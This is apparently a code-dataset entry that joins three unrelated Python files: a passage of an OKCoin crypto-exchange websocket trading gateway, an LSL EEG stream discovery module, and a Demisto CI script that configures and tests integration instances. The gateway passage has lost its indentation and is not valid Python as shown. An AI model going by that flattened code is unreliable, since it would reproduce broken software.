# self.subscribeSpotTicker(vnokcoin.SYMBOL_ETH)
a = ['bch']
bs = self.gateway.coins + '_btc'
es = self.gateway.coins + '_eth'
self.subscribeSpotDepth(bs, '5')
self.subscribeSpotDepth(es, '5')
self.subscribeSpotDepth('eth_btc', '5')
# self.subscribeSpotDepth('cmt_btc', '5')
# self.subscribeSpotDepth('ltc_btc', '5')
# self.subscribeSpotDepth(vnokcoin.SYMBOL_LTC, vnokcoin.DEPTH_20)
# self.subscribeSpotDepth(vnokcoin.SYMBOL_ETH, vnokcoin.DEPTH_20)
# 如果连接的是USD网站则订阅期货相关回报数据
# if self.currency == vnokcoin.CURRENCY_USD:
# self.subscribeFutureTrades()
# self.subscribeFutureUserInfo()
# self.subscribeFuturePositions()
# 返回合约信息
# if self.currency == vnokcoin.CURRENCY_CNY:
# l = self.generateCnyContract()
# else:
# l = self.generateUsdContract()
#
# for contract in l:
# contract.gatewayName = self.gatewayName
# self.gateway.onContract(contract)
#----------------------------------------------------------------------
def writeLog(self, content):
"""快速记录日志"""
log = VtLogData()
log.gatewayName = self.gatewayName
log.logContent = content
print log.logTime,log.logContent
self.gateway.onLog(log)
# ----------------------------------------------------------------------
def getCallback(self, channel):
"""初始化回调函数"""
if channel.endswith('_ticker'):
return self.onTicker
elif channel.endswith('_depth_5'):
return self.onDepth
elif channel.endswith('_userinfo'):
return self.onSpotUserInfo
elif channel.endswith('_orderinfo'):
return self.onSpotOrderInfo
elif channel == 'ok_spot_order':
return self.onSpotTrade
elif channel == 'ok_spot_cancel_order':
return self.onSpotCancelOrder
elif channel.endswith('_order'):
return self.onSpotSubTrades
elif channel.endswith('_balance'):
return self.onSpotSubUserInfo
#----------------------------------------------------------------------
def onTicker(self, data):
""""""
if 'data' not in data:
return
channel = data['channel']
symbol = channelSymbolMap[channel]
if symbol not in self.tickDict:
tick = VtTickData()
tick.symbol = symbol
tick.vtSymbol = symbol
tick.gatewayName = self.gatewayName
self.tickDict[symbol] = tick
else:
tick = self.tickDict[symbol]
rawData = data['data']
tick.highPrice = float(rawData['high'])
tick.lowPrice = float(rawData['low'])
tick.lastPrice = float(rawData['last'])
tick.volume = float(rawData['vol'])
#tick.date, tick.time = generateDateTime(rawData['timestamp'])
newtick = copy(tick)
self.gateway.onTick(newtick)
#----------------------------------------------------------------------
def onDepth(self, data):
""""""
if 'data' not in data:
return
channel = data['channel']
a = channel.split('_')
symbol = str('_'.join((a[3], a[4])))
# symbol = channelSymbolMap[channel]
if symbol not in self.tickDict:
tick = VtTickData()
tick.symbol = symbol
tick.vtSymbol = symbol
tick.gatewayName = self.gatewayName
self.tickDict[symbol] = tick
else:
tick = self.tickDict[symbol]
if 'data' not in data:
return
rawData = data['data']
tick.bidPrice1, tick.bidVolume1 = rawData['bids'][0]
tick.bidPrice2, tick.bidVolume2 = rawData['bids'][1]
tick.bidPrice3, tick.bidVolume3 = rawData['bids'][2]
tick.bidPrice4, tick.bidVolume4 = rawData['bids'][3]
tick.bidPrice5, tick.bidVolume5 = rawData['bids'][4]
tick.askPrice1, tick.askVolume1 = rawData['asks'][-1]
tick.askPrice2, tick.askVolume2 = rawData['asks'][-2]
tick.askPrice3, tick.askVolume3 = rawData['asks'][-3]
tick.askPrice4, tick.askVolume4 = rawData['asks'][-4]
tick.askPrice5, tick.askVolume5 = rawData['asks'][-5]
tick.date, tick.time = generateDateTime(rawData['timestamp'])
newtick = copy(tick)
# self.tickCount += 1
self.depth[symbol] = newtick
# print self.tickCount
# print self.depth
# print self.depth
self.gateway.onTick(newtick)
#----------------------------------------------------------------------
def onSpotUserInfo(self, data):
"""现货账户资金推送"""
rawData = data['data']
# print rawData
info = rawData['info']
funds = rawData['info']['funds']
for coin in funds['freezed']:
self.account['freezed'][coin] = float(funds['freezed'][coin])
self.account['free'][coin] = float(funds['free'][coin])
# print self.account
# # 持仓信息
# for symbol in ['btc', 'ltc','eth', self.currency]:
# if symbol in funds['free']:
# pos = VtPositionData()
# pos.gatewayName = self.gatewayName
#
# pos.symbol = symbol
# pos.vtSymbol = symbol
# pos.vtPositionName = symbol
# # pos.direction = DIRECTION_NET
#
# pos.frozen = float(funds['freezed'][symbol])
# pos.position = pos.frozen + float(funds['free'][symbol])
#
# self.gateway.onPosition(pos)
# 账户资金
account = VtAccountData()
account.gatewayName = self.gatewayName
account.accountID = self.gatewayName
account.vtAccountID = account.accountID
account.balance = float(funds['free']['btc'])
self.gateway.onAccount(account)
#----------------------------------------------------------------------
def onSpotSubUserInfo(self, data):
"""现货账户资金推送"""
rawData = data['data']
funds = rawData['info']
self.writeLog(funds)
for coin in funds['free']:
self.account['freezed'][coin] = float(funds['freezed'][coin])
self.account['free'][coin] = float(funds['free'][coin])
# 持仓信息
# for symbol in funds['free']:
# pos = VtPositionData()
# pos.gatewayName = self.gatewayName
#
# pos.symbol = symbol
# pos.vtSymbol = symbol
# pos.vtPositionName = symbol
# # pos.direction = DIRECTION_NET
#
# pos.frozen = float(funds['freezed'][symbol])
# pos.position = pos.frozen + float(funds['free'][symbol])
# self.gateway.onPosition(pos)
# # 账户资金
# account = VtAccountData()
# account.gatewayName = self.gatewayName
# account.accountID = self.gatewayName
# account.vtAccountID = account.accountID
# account.balance = float(funds['free']['btc'])
# self.gateway.onAccount(account)
#----------------------------------------------------------------------
def onSpotSubTrades(self, data):
"""成交和委托推送"""
if 'data' not in data:
return
rawData = data['data']
if rawData['symbol'] in self.gateway.tradeSymbols:
self.writeLog(rawData)
# 本地和系统委托号
orderId = str(rawData['orderId'])
# 委托信息
if orderId not in self.orderDict.keys():
order = VtOrderData()
order.gatewayName = self.gatewayName
order.symbol = rawData['symbol']
order.vtSymbol = order.symbol
order.orderID = str(rawData['orderId'])
order.vtOrderID = '.'.join([self.gatewayName, order.orderID])
order.price = float(rawData['tradeUnitPrice'])
order.totalVolume = float(rawData['tradeAmount'])
order.direction = rawData['tradeType']
self.orderDict[orderId] = order
else:
order = self.orderDict[orderId]
order.tradedVolume = float(rawData['completedTradeAmount'])
order.status = rawData['status']
self.orderDict[orderId] = order
if str(order.status) == '2':
self.orderDict.pop(order.orderID)
self.gateway.onOrder(copy(order))
# 成交信息
# if 'sigTradeAmount' in rawData and float(rawData['sigTradeAmount'])>0:
# trade = VtTradeData()
# trade.gatewayName = self.gatewayName
#
# trade.symbol = rawData['symbol']
# trade.vtSymbol = order.symbol
#
# trade.tradeID = str(rawData['orderId'])
# trade.vtTradeID = '.'.join([self.gatewayName, trade.tradeID])
#
# trade.orderID = str(rawData['orderId'])
# trade.vtOrderID = '.'.join([self.gatewayName, trade.orderID])
#
# trade.price = float(rawData['sigTradePrice'])
# trade.volume = float(rawData['sigTradeAmount'])
#
# trade.direction = rawData['tradeType']
#
# trade.tradeTime = datetime.now().strftime('%H:%M:%S')
#
# self.gateway.onTrade(trade)
#----------------------------------------------------------------------
def onSpotOrderInfo(self, data):
"""委托信息查询回调"""
rawData = data['data']
for d in rawData['orders']:
self.localNo += 1
localNo = str(self.localNo)
orderId = str(d['order_id'])
self.localNoDict[localNo] = orderId
self.orderIdDict[orderId] = localNo
if orderId not in self.orderDict:
order = VtOrderData()
order.gatewayName = self.gatewayName
order.symbol = d['symbol']
order.vtSymbol = order.symbol
order.orderID = localNo
order.vtOrderID = '.'.join([self.gatewayName, order.orderID])
order.price = d['price']
order.totalVolume = d['amount']
order.direction = d['type']
self.orderDict[orderId] = order
else:
order = self.orderDict[orderId]
order.tradedVolume = d['deal_amount']
order.status = d['status']
self.orderDict[orderId] = order
# print '==========order============'
# print order.symbol
# print order.orderId
# print order.status
self.gateway.onOrder(copy(order))
#----------------------------------------------------------------------
def generateSpecificContract(self, contract, symbol):
"""生成合约"""
new = copy(contract)
new.symbol = symbol
new.vtSymbol = symbol
new.name = symbol
return new
#----------------------------------------------------------------------
def generateCnyContract(self):
"""生成CNY合约信息"""
contractList = []
contract = VtContractData()
contract.exchange = EXCHANGE_OKCOIN
contract.productClass = PRODUCT_SPOT
contract.size = 1
contract.priceTick = 0.01
contractList.append(self.generateSpecificContract(contract, BTC_CNY_SPOT))
contractList.append(self.generateSpecificContract(contract, LTC_CNY_SPOT))
contractList.append(self.generateSpecificContract(contract, ETH_CNY_SPOT))
return contractList
#----------------------------------------------------------------------
def generateUsdContract(self):
"""生成USD合约信息"""
contractList = []
# 现货
contract = VtContractData()
contract.exchange = EXCHANGE_OKCOIN
contract.productClass = PRODUCT_SPOT
contract.size = 1
contract.priceTick = 0.01
contractList.append(self.generateSpecificContract(contract, BTC_USD_SPOT))
contractList.append(self.generateSpecificContract(contract, LTC_USD_SPOT))
contractList.append(self.generateSpecificContract(contract, ETH_USD_SPOT))
# 期货
contract.productClass = PRODUCT_FUTURES
contractList.append(self.generateSpecificContract(contract, BTC_USD_THISWEEK))
contractList.append(self.generateSpecificContract(contract, BTC_USD_NEXTWEEK))
contractList.append(self.generateSpecificContract(contract, BTC_USD_QUARTER))
contractList.append(self.generateSpecificContract(contract, LTC_USD_THISWEEK))
contractList.append(self.generateSpecificContract(contract, LTC_USD_NEXTWEEK))
contractList.append(self.generateSpecificContract(contract, LTC_USD_QUARTER))
contractList.append(self.generateSpecificContract(contract, ETH_USD_THISWEEK))
contractList.append(self.generateSpecificContract(contract, ETH_USD_NEXTWEEK))
contractList.append(self.generateSpecificContract(contract, ETH_USD_QUARTER))
return contractList
#----------------------------------------------------------------------
def onSpotTrade(self, data):
"""委托回报"""
print 'onSpotTrade', data
rawData = data['data']
if 'order_id' not in rawData:
self.writeLog('[order]error_code:%s' % str(rawData['error_code']))
orderId = rawData['order_id']
# print orderId
# 尽管websocket接口的委托号返回是异步的,但经过测试是
# 符合先发现回的规律,因此这里通过queue获取之前发送的
# 本地委托号,并把它和推送的系统委托号进行映射
# localNo = self.localNoQueue.get_nowait()
# self.localNoDict[localNo] = orderId
# self.orderIdDict[orderId] = localNo
# 检查是否有系统委托号返回前就发出的撤单请求,若有则进
# 行撤单操作
# if localNo in self.cancelDict:
# req = self.cancelDict[localNo]
# self.spotCancel(req)
# del self.cancelDict[localNo]
#----------------------------------------------------------------------
def onSpotCancelOrder(self, data):
"""撤单回报"""
pass
#----------------------------------------------------------------------
def spotSendOrder(self, req):
"""发单"""
self.spotTrade(req.symbol, req.priceType, str(req.price), str(req.volume))
self.writeLog('[SendOrder]%s|%s|%s|%s' % (req.symbol, req.priceType, str(req.price), str(req.volume)))
# 本地委托号加1,并将对应字符串保存到队列中,返回基于本地委托号的vtOrderID
self.localNo += 1
self.localNoQueue.put(str(self.localNo))
vtOrderID = '.'.join([self.gatewayName, str(self.localNo)])
return vtOrderID
#----------------------------------------------------------------------
def spotCancel(self, req):
"""撤单"""
symbol = req.symbol
self.spotCancelOrder(req.symbol, req.orderID)
self.writeLog('[CancelOrder]%s|%s' % (req.symbol, req.orderID))
#----------------------------------------------------------------------
def generateDateTime(s):
"""生成时间"""
dt = datetime.fromtimestamp(float(s)/1e3)
time = dt.strftime("%H:%M:%S.%f")
date = dt.strftime("%Y%m%d")
return date, time
|
discovery.py | """
Discovery Module for LSL stream discovery and data retrieval
"""
import logging
from threading import current_thread, Thread
from pylsl import resolve_bypred, LostError, TimeoutError, resolve_streams
from .stream import Stream
class Discovery:
    """
    Class representing the available LSL stream information and incoming data
    """
    def __init__(self, **options):
        """
        :param options: additional arguments forwarded to each Stream object
        """
        self.logger = logging.getLogger(__name__)
        self.options = options
        # signature of the first ("master") stream; later streams must match
        self.sample_rate = None
        self.channel_count = None
        self.streams_by_uid = {}
        self.running = False
        self.thread = None

    def start(self):
        """
        Start the thread to resolve LSL streams

        :return: False when the discovery thread is already running
        """
        if self.thread:
            return False
        self.thread = Thread(target=self._refresh, daemon=True, name="Discovery")
        self.running = True
        self.thread.start()
        return True

    def stop(self):
        """
        Stop LSL stream search
        """
        if not self.thread:
            return True
        self.running = False
        # joining from inside the discovery thread itself would deadlock
        if current_thread() is not self.thread:
            self.thread.join()
            self.thread = None
        return True

    def streams(self):
        """
        :return: a list of Stream objects
        """
        return list(self.streams_by_uid.values())

    def _refresh(self):
        # _resolve blocks inside resolve_bypred, so this loop does not spin
        while self.running:
            self._resolve()

    def _resolve(self):
        """
        Search for available EEG streams on LSL and connect to them by saving them as Stream objects
        """
        # resolve EEG streams and retrieve their information
        streams_info = resolve_bypred("type='EEG'", 0, 2.5)
        streams_active = []
        self.logger.debug("Found {} available streams".format(len(streams_info)))
        for stream_info in streams_info:
            # combined uid so streams with the same source_id stay distinct
            uid = stream_info.source_id() + ' | ' + stream_info.uid()
            streams_active.append(uid)
            # connect to streams we have not seen yet (if signature matches)
            if uid not in self.streams_by_uid:
                if self._validate_stream_signature(stream_info):
                    self._connect_to(uid, stream_info)
            # a saved stream that stopped running is cleaned up immediately
            # FIX: idiom - was "... .running == False"
            if uid in self.streams_by_uid:
                if not self.streams_by_uid[uid].running:
                    self._disconnect_from({uid})
        # drop every saved stream that was not resolved this round
        self._disconnect_from(list(set(self.streams_by_uid.keys()) - set(streams_active)))

    def _validate_stream_signature(self, stream_info):
        """
        Check that the stream's sampling rate and channel count match the
        master stream's (when one has been elected)

        :param stream_info: current stream information
        """
        if self.sample_rate and self.sample_rate != stream_info.nominal_srate():
            return False
        if self.channel_count and self.channel_count != stream_info.channel_count():
            return False
        return True

    def _connect_to(self, uid, stream_info):
        """
        Connect to the stream using the stream information

        :param uid: the stream ID, i.e., 'source_id | uid'
        :param stream_info: stream information
        """
        stream = None
        try:
            self.logger.info("{}: Discovered at {}hz with {} channels, connecting".format(stream_info.name(), stream_info.nominal_srate(), stream_info.channel_count()))
            # create the Stream object using the retrieved stream information
            stream = Stream(uid, stream_info, **self.options)
            stream.start()  # start the Stream thread
            self.logger.warning("{}: Connected".format(stream_info.name()))
        except (LostError, TimeoutError):
            self.logger.warning("{}: Could not connect".format(stream_info.name()))
        if stream:
            # the first connected stream defines the expected signature
            # FIX: idiom - was "len(self.streams_by_uid) == 0"
            if not self.streams_by_uid:
                self.sample_rate = stream.sample_rate
                self.channel_count = stream.channel_count
                self.logger.info("{}: Elected master stream at {}hz with {} channels".format(stream.name, stream.sample_rate, stream.channel_count))
            self.streams_by_uid[uid] = stream

    def _disconnect_from(self, inactive_uids):
        """
        Disconnect from streams using their IDs

        :param inactive_uids: inactive streams' IDs
        """
        for uid in inactive_uids:
            if self.streams_by_uid[uid].running:
                # still running: ask the stream thread to stop first
                self.logger.info("{}: Disconnected, killing thread".format(self.streams_by_uid[uid].name))
                self.streams_by_uid[uid].stop()
            else:
                self.logger.info("{}: Killed, cleaning up".format(self.streams_by_uid[uid].name))
                del self.streams_by_uid[uid]
        # once the last stream is gone, a new master may be elected
        if not self.streams_by_uid:
            self.sample_rate = None
            self.channel_count = None
|
configure_and_test_integration_instances.py | from __future__ import print_function
import argparse
import ast
import json
import logging
import os
import subprocess
import sys
import uuid
import zipfile
from datetime import datetime
from distutils.version import LooseVersion
from enum import IntEnum
from pprint import pformat
from threading import Thread
from time import sleep
from typing import List, Optional, Tuple
import demisto_client
from demisto_sdk.commands.test_content.constants import SSH_USER
from ruamel import yaml
from Tests.Marketplace.search_and_install_packs import search_and_install_packs_and_their_dependencies, \
    install_all_content_packs, upload_zipped_packs, install_all_content_packs_for_nightly
from Tests.scripts.utils.log_util import install_logging
from Tests.test_content import extract_filtered_tests, get_server_numeric_version
from Tests.test_integration import __get_integration_config, __test_integration_instance, disable_all_integrations
from Tests.tools import run_with_proxy_configured
from Tests.update_content_data import update_content
from demisto_sdk.commands.common.constants import FileType
from demisto_sdk.commands.common.tools import run_threads_list, run_command, get_yaml, \
    str2bool, format_version, find_type
from demisto_sdk.commands.test_content.mock_server import MITMProxy, run_with_mock, RESULT
from demisto_sdk.commands.test_content.tools import update_server_configuration, is_redhat_instance
from demisto_sdk.commands.validate.validate_manager import ValidateManager
# Machine roles that use the legacy marketplace content endpoints
MARKET_PLACE_MACHINES = ('master',)
# Packs that are never installed on test instances
SKIPPED_PACKS = ['NonSupported', 'ApiModules']
# Hosts that containers must reach directly, bypassing the mock proxy
NO_PROXY = ','.join([
    'oproxy.demisto.ninja',
    'oproxy-dev.demisto.ninja',
])
# Server key passing the no_proxy env var into python containers ('##' separates extra docker args)
NO_PROXY_CONFIG = {'python.pass.extra.keys': f'--env##no_proxy={NO_PROXY}'}  # noqa: E501
# Docker resource/user restrictions applied to servers >= 5.5 (non-podman)
DOCKER_HARDENING_CONFIGURATION = {
    'docker.cpu.limit': '1.0',
    'docker.run.internal.asuser': 'true',
    'limit.docker.cpu': 'true',
    'python.pass.extra.keys': f'--memory=1g##--memory-swap=-1##--pids-limit=256##--ulimit=nofile=1024:8192##--env##no_proxy={NO_PROXY}', # noqa: E501
    'powershell.pass.extra.keys': f'--env##no_proxy={NO_PROXY}',
}
# Reduced hardening used when the instance runs podman (RedHat instances)
DOCKER_HARDENING_CONFIGURATION_FOR_PODMAN = {
    'docker.run.internal.asuser': 'true'
}
# Settings applied on servers >= 6.0 so marketplace installs are fast and unverified
MARKET_PLACE_CONFIGURATION = {
    'content.pack.verify': 'false',
    'marketplace.initial.sync.delay': '0',
    'content.pack.ignore.missing.warnings.contentpack': 'true'
}
# Skip docker image validation on servers <= 5.5 (see configure_servers_and_restart)
AVOID_DOCKER_IMAGE_VALIDATION = {
    'content.validate.docker.images': 'false'
}
# Default location of the content ID set, used when --id_set_path is not given
ID_SET_PATH = './Tests/id_set.json'
class Running(IntEnum):
    """Environment the build is executing in; selects how server details are discovered."""
    CIRCLECI_RUN = 0  # CI run: servers come from env_results.json (see get_env_conf)
    WITH_OTHER_SERVER = 1  # local run against a remote server
    WITH_LOCAL_SERVER = 2  # local run against localhost:8080
class Server:
    """A single Demisto server reachable through a local SSH tunnel."""

    def __init__(self, internal_ip, port, user_name, password):
        self.internal_ip = internal_ip
        self.ssh_tunnel_port = port
        self.user_name = user_name
        self.password = password
        # lazily created handles
        self.__ssh_client = None
        self.__client = None

    def __str__(self):
        return self.internal_ip

    @property
    def client(self):
        """Return the cached demisto_client, creating it on first access."""
        if self.__client is None:
            self.__client = self.reconnect_client()
        return self.__client

    def reconnect_client(self):
        """Build a fresh demisto_client against the local SSH tunnel and cache it."""
        self.__client = demisto_client.configure(f'https://localhost:{self.ssh_tunnel_port}',
                                                 verify_ssl=False,
                                                 username=self.user_name,
                                                 password=self.password)
        return self.__client

    def add_server_configuration(self, config_dict, error_msg, restart=False):
        """Push server configuration keys, optionally restarting the demisto service."""
        update_server_configuration(self.client, config_dict, error_msg)
        if restart:
            self.exec_command('sudo systemctl restart demisto')

    def exec_command(self, command):
        """Run a command on the server over SSH; raises CalledProcessError on failure."""
        subprocess.check_output(f'ssh {SSH_USER}@{self.internal_ip} {command}'.split(),
                                stderr=subprocess.STDOUT)
def get_id_set(id_set_path) -> Optional[dict]:
    """
    Used to collect the ID set so it can be passed to the Build class on init.

    :param id_set_path: Path to the ID set JSON file.
    :return: ID set as a dict if the file exists, otherwise None.
    """
    if os.path.isfile(id_set_path):
        return get_json_file(id_set_path)
    # Previously returned None implicitly while annotated '-> dict';
    # make the missing-file result explicit.
    return None
class Build:
    """Aggregates every piece of configuration a single build/test run needs."""
    # START CHANGE ON LOCAL RUN #
    content_path = '{}/project'.format(os.getenv('HOME'))
    test_pack_target = '{}/project/Tests'.format(os.getenv('HOME'))
    key_file_path = 'Use in case of running with non local server'
    run_environment = Running.CIRCLECI_RUN
    env_results_path = './env_results.json'
    DEFAULT_SERVER_VERSION = '99.99.98'
    # END CHANGE ON LOCAL RUN #

    def __init__(self, options):
        self._proxy = None
        self.git_sha1 = options.git_sha1
        self.branch_name = options.branch
        self.ci_build_number = options.build_number
        self.is_nightly = options.is_nightly
        self.ami_env = options.ami_env
        self.server_to_port_mapping, self.server_numeric_version = self.get_servers(options.ami_env)
        self.secret_conf = get_json_file(options.secret)
        # CLI-provided credentials take precedence over the secret conf ones
        self.username = options.user if options.user else self.secret_conf.get('username')
        self.password = options.password if options.password else self.secret_conf.get('userPassword')
        self.servers = [Server(internal_ip,
                               port,
                               self.username,
                               self.password) for internal_ip, port in self.server_to_port_mapping.items()]
        self.is_private = options.is_private
        conf = get_json_file(options.conf)
        self.tests = conf['tests']
        self.skipped_integrations_conf = conf['skipped_integrations']
        self.unmockable_integrations = conf['unmockable_integrations']
        id_set_path = options.id_set_path if options.id_set_path else ID_SET_PATH
        self.id_set = get_id_set(id_set_path)
        self.test_pack_path = options.test_pack_path if options.test_pack_path else None
        self.tests_to_run = self.fetch_tests_list(options.tests_to_run)
        self.content_root = options.content_root
        self.pack_ids_to_install = self.fetch_pack_ids_to_install(options.pack_ids_to_install)
        self.service_account = options.service_account

    @property
    def proxy(self) -> MITMProxy:
        """
        A property method that should create and return a single proxy instance through out the build
        Returns:
            The single proxy instance that should be used in this build.
        """
        if not self._proxy:
            self._proxy = MITMProxy(self.servers[0].internal_ip,
                                    logging_module=logging,
                                    build_number=self.ci_build_number,
                                    branch_name=self.branch_name)
        return self._proxy

    @staticmethod
    def _read_stripped_lines(path: str) -> List[str]:
        """Read a text file and return its lines with trailing whitespace removed."""
        with open(path, "r") as file_handle:
            return [line.rstrip() for line in file_handle.readlines()]

    @staticmethod
    def fetch_tests_list(tests_to_run_path: str):
        """
        Fetches the test list from the filter file.
        :param tests_to_run_path: Path to location of test filter.
        :return: List of tests if there are any, otherwise empty list.
        """
        # was a copy of the read loop in fetch_pack_ids_to_install; now shared
        return Build._read_stripped_lines(tests_to_run_path)

    @staticmethod
    def fetch_pack_ids_to_install(packs_to_install_path: str):
        """
        Fetches the pack IDs to install from the file.
        :param packs_to_install_path: Path to location of pack IDs to install file.
        :return: List of Pack IDs if there are any, otherwise empty list.
        """
        return Build._read_stripped_lines(packs_to_install_path)

    @staticmethod
    def get_servers(ami_env):
        """Map server IPs to tunnel ports and resolve the server numeric version."""
        env_conf = get_env_conf()
        server_to_port_mapping = map_server_to_port(env_conf, ami_env)
        if Build.run_environment == Running.CIRCLECI_RUN:
            server_numeric_version = get_server_numeric_version(ami_env)
        else:
            # local runs have no env_results-driven version; use the sentinel default
            server_numeric_version = Build.DEFAULT_SERVER_VERSION
        return server_to_port_mapping, server_numeric_version
def options_handler():
    """Parse and return the command-line options for this utility."""
    arg_parser = argparse.ArgumentParser(description='Utility for instantiating and testing integration instances')
    arg_parser.add_argument('-u', '--user', help='The username for the login', required=True)
    arg_parser.add_argument('-p', '--password', help='The password for the login', required=True)
    arg_parser.add_argument('--ami_env', help='The AMI environment for the current run. Options are '
                                              '"Server Master", "Server 5.0". '
                                              'The server url is determined by the AMI environment.')
    arg_parser.add_argument('-g', '--git_sha1', help='commit sha1 to compare changes with')
    arg_parser.add_argument('-c', '--conf', help='Path to conf file', required=True)
    arg_parser.add_argument('-s', '--secret', help='Path to secret conf file')
    arg_parser.add_argument('-n', '--is-nightly', type=str2bool, help='Is nightly build')
    arg_parser.add_argument('-pr', '--is_private', type=str2bool, help='Is private build')
    arg_parser.add_argument('--branch', help='GitHub branch name', required=True)
    arg_parser.add_argument('--build-number', help='CI job number where the instances were created', required=True)
    arg_parser.add_argument('--test_pack_path', help='Path to where the test pack will be saved.',
                            default='/home/runner/work/content-private/content-private/content/artifacts/packs')
    arg_parser.add_argument('--content_root', help='Path to the content root.',
                            default='/home/runner/work/content-private/content-private/content')
    arg_parser.add_argument('--id_set_path', help='Path to the ID set.')
    arg_parser.add_argument('-l', '--tests_to_run', help='Path to the Test Filter.',
                            default='./Tests/filter_file.txt')
    arg_parser.add_argument('-pl', '--pack_ids_to_install', help='Path to the packs to install file.',
                            default='./Tests/content_packs_to_install.txt')
    # disable-secrets-detection-start
    arg_parser.add_argument('-sa', '--service_account',
                            help=("Path to gcloud service account, is for circleCI usage. "
                                  "For local development use your personal account and "
                                  "authenticate using Google Cloud SDK by running: "
                                  "`gcloud auth application-default login` and leave this parameter blank. "
                                  "For more information go to: "
                                  "https://googleapis.dev/python/google-api-core/latest/auth.html"),
                            required=False)
    # disable-secrets-detection-end
    return arg_parser.parse_args()
def check_test_version_compatible_with_server(test, server_version):
    """
    Checks if a given test is compatible with the given server version.
    Arguments:
        test: (dict)
            Test playbook object from content conf.json. May contain the following fields: "playbookID",
            "integrations", "instance_names", "timeout", "nightly", "fromversion", "toversion.
        server_version: (int)
            The server numerical version.
    Returns:
        (bool) True if test is compatible with server version or False otherwise.
    """
    test_from_version = format_version(test.get('fromversion', '0.0.0'))
    test_to_version = format_version(test.get('toversion', '99.99.99'))
    server_version = format_version(server_version)
    # compatible when the server version falls inside the test's declared range
    in_range = LooseVersion(test_from_version) <= LooseVersion(server_version) <= LooseVersion(test_to_version)
    if in_range:
        return True
    playbook_id = test.get('playbookID')
    logging.debug(
        f'Test Playbook: {playbook_id} was ignored in the content installation test due to version mismatch '
        f'(test versions: {test_from_version}-{test_to_version}, server version: {server_version})')
    return False
def filter_tests_with_incompatible_version(tests, server_version):
    """
    Filter all tests with incompatible version to the given server.
    Arguments:
        tests: (list)
            List of test objects.
        server_version: (int)
            The server numerical version.
    Returns:
        (lst): List of filtered tests (compatible version)
    """
    compatible_tests = []
    for test in tests:
        if check_test_version_compatible_with_server(test, server_version):
            compatible_tests.append(test)
    return compatible_tests
def configure_integration_instance(integration, client, placeholders_map):
    """
    Configure an instance for an integration

    Arguments:
        integration: (dict)
            Integration object whose params key-values are set
        client: (demisto_client)
            The client to connect to
        placeholders_map: (dict)
            Dict that holds the real values to be replaced for each placeholder.

    Returns:
        (dict): Configured integration instance, or None when configuration is skipped/unavailable.
    """
    integration_name = integration.get('name')
    logging.info(f'Configuring instance for integration "{integration_name}"')
    # In the integration configuration in content-test-conf conf.json, the test_validate flag was set to false.
    # Check this cheap local flag BEFORE making the remote configuration request (previously the
    # request was issued and then discarded for skipped integrations).
    validate_test = integration.get('validate_test', True)
    if not validate_test:
        logging.debug(f'Skipping configuration for integration: {integration_name} (it has test_validate set to false)')
        return None
    integration_instance_name = integration.get('instance_name', '')
    integration_params = change_placeholders_to_values(placeholders_map, integration.get('params'))
    is_byoi = integration.get('byoi', True)
    integration_configuration = __get_integration_config(client, integration_name)
    if not integration_configuration:
        return None
    module_instance = set_integration_instance_parameters(integration_configuration, integration_params,
                                                          integration_instance_name, is_byoi, client)
    return module_instance
def filepath_to_integration_name(integration_file_path):
    """Load an integration file and return the integration name.
    Args:
        integration_file_path (str): The path to an integration yml file.
    Returns:
        (str): The name of the integration.
    """
    return get_yaml(integration_file_path).get('name')
def get_integration_names_from_files(integration_files_list):
    """Map integration file paths to integration names, dropping empty values."""
    names = (filepath_to_integration_name(file_path) for file_path in integration_files_list)
    return [name for name in names if name]
def get_new_and_modified_integration_files(branch_name):
    """Return 2 lists - list of new integrations and list of modified integrations since the first commit of the branch.
    Args:
        branch_name: The branch name against which we will run the 'git diff' command.
    Returns:
        (tuple): Returns a tuple of two lists, the file paths of the new integrations and modified integrations.
    """
    def _is_integration_file(file_path):
        # both regular and beta integration yml files count
        return find_type(file_path) in [FileType.INTEGRATION, FileType.BETA_INTEGRATION]

    # get changed yaml files (filter only added and modified files)
    file_validator = ValidateManager()
    file_validator.branch_name = branch_name
    modified_files, added_files, _, _ = file_validator.get_changed_files_from_git()
    new_integration_files = [file_path for file_path in added_files if _is_integration_file(file_path)]
    # NOTE(review): modified_files appears to contain non-string entries as well
    # (hence the isinstance guard) — presumably rename tuples; confirm against demisto-sdk.
    modified_integration_files = [file_path for file_path in modified_files
                                  if isinstance(file_path, str) and _is_integration_file(file_path)]
    return new_integration_files, modified_integration_files
def is_content_update_in_progress(client):
    """Make request to check if content is updating.
    Args:
        client (demisto_client): The configured client to use.
    Returns:
        (str): Returns the request response data which is 'true' if updating and 'false' if not.
    """
    host = client.api_client.configuration.host
    logging.debug(f'Making "Get" request to server - "{host}" to check if content is installing.')
    # make request to check if content is updating
    response_data, status_code, _ = demisto_client.generic_request_func(self=client, path='/content/updating',
                                                                        method='GET', accept='application/json')
    if not 200 <= status_code < 300:
        # non-2xx: surface the server's message and report a sentinel value
        result_object = ast.literal_eval(response_data)
        message = result_object.get('message', '')
        logging.error(f"Failed to check if content is installing - with status code {status_code}\n{message}")
        return 'request unsuccessful'
    return response_data
def get_content_version_details(client, ami_name):
    """Make request for details about the content installed on the demisto instance.
    Args:
        client (demisto_client): The configured client to use.
        ami_name (string): the role name of the machine
    Returns:
        (tuple): The release version and asset ID of the content installed on the demisto instance.
    """
    host = client.api_client.configuration.host
    logging.info(f'Making "POST" request to server - "{host}" to check installed content.')
    # marketplace ("master") machines must use the legacy endpoint
    uri = '/content/installedlegacy' if ami_name in MARKET_PLACE_MACHINES else '/content/installed'
    response_data, status_code, _ = demisto_client.generic_request_func(self=client, path=uri,
                                                                        method='POST')
    try:
        result_object = ast.literal_eval(response_data)
        logging.debug(f'Response was {response_data}')
    except ValueError:
        logging.exception('failed to parse response from demisto.')
        return '', 0
    if not 200 <= status_code < 300:
        message = result_object.get('message', '')
        logging.error(f'Failed to check if installed content details - with status code {status_code}\n{message}')
    return result_object.get('release', ''), result_object.get('assetId', 0)
def change_placeholders_to_values(placeholders_map, config_item):
    """Replaces placeholders in the object to their real values
    Args:
        placeholders_map: (dict)
            Dict that holds the real values to be replaced for each placeholder.
        config_item: (json object)
            Integration configuration object.
    Returns:
        dict. json object with the real configuration.
    """
    # round-trip through a JSON string so placeholders anywhere in the
    # (possibly nested) object are substituted in one pass
    serialized = json.dumps(config_item)
    for placeholder, real_value in placeholders_map.items():
        serialized = serialized.replace(placeholder, str(real_value))
    return json.loads(serialized)
def set_integration_params(build,
                           integrations,
                           secret_params,
                           instance_names,
                           placeholders_map,
                           logging_module=logging):
    """
    For each integration object, fill in the parameter values needed to configure an instance from
